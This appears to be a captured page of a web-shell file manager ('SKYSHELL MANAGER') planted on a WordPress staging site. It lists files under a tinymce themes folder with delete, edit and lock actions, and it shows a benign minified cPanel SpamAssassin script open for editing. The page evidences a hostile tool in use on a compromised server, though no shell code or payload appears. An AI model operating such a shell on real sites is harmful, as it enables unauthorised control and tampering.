📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: atAGlance.min.js
define(["angular","lodash","cjt/util/locale","app/services/spamAssassin"],(function(e,t,s){"use strict";return e.module("cpanel.apacheSpamAssassin").controller("atAGlance",["$scope","spamAssassin",function(t,n){function a(e,s,n){return t.settings[e]?n():s()}e.extend(t,{settings:n.spamAssassinSettings,toggleAdditionalFeatures:function(e){t.showingAdditionalFeatures=e},toggleEnableAutoDelete:function(){return a("spam_auto_delete",(function(){return n.enableAutoDelete(n.spamAssassinSettings.spam_auto_delete_score)}),n.disableAutoDelete)},toggleEnableSpamBox:function(){return a("spam_box_enabled",n.enableSpamBox,n.disableSpamBox)},preferences:n.userPreferences,toggleEnable:function(){return a("spam_enabled",n.enableSpamAssassin,n.disableSpamAssassin)},whitelistCountString:function(){return s.maketext("You currently have [quant,_1,whitelisted item,whitelisted items].",t.preferences.whitelist_from.length)},blacklistCountString:function(){return s.maketext("You currently have [quant,_1,blacklisted item,blacklisted items].",t.preferences.blacklist_from.length)},scoreCountString:function(){return s.maketext("You currently have [quant,_1,calculated spam score customization, calculated spam score customizations] on this account.",t.preferences.score.length)},showingAdditionalFeatures:!1,spamBoxFeatureEnabled:n.hasFeature("spamBox"),autoDeleteFeatureEnabled:n.hasFeature("spamAutoDelete")})}])}));
Save